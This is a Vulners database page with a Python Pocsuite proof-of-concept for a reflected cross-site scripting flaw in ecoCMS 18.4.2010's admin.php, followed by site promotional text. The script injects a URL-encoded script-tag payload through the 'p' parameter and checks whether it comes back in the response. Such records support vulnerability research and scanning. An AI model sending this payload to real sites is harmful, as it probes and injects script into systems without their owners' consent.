Vulners
Lucene search
ecoCMS 18.4.2010 'admin.php' Cross Site Scripting Vulnerability
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from urlparse import urljoin
class TestPOC(POCBase):
vulID = 'SSV-87089' # vul ID
version = '1'
author = 'fenghh'
vulDate = '2010-05-18'
createDate = '2015-10-17'
updateDate = '2015-10-17'
references = ['https://www.exploit-db.com/exploits/33925/']
name = "ecoCMS 18.4.2010 - 'admin.php' Cross-Site Scripting Vulnerability"
appPowerLink = 'http://www.ecocms.com/'
appName = 'ecoCMS'
appVersion = '18.4.2010'
vulType = 'XSS'
desc = '''
ecoCMS的admin.php中存在跨站脚本漏洞。远程攻击者可借助p参数注入任意web脚本或者HTML。
'''
# the sample sites for examine
samples = ['']
def _verify(self):
payload_xss = "/admin.php?p=1%22%3E%3Cscript%3Ealert%28/SebugTest/%29%3C/script%3E"
res = req.get(urljoin(self.url, payload_xss), timeout=5)
return self.parse_verify(res)
def parse_verify(self, res):
output = Output(self)
result = {}
if '>alert(/SebugTest/)' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def _attack(self):
return self._verify()
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1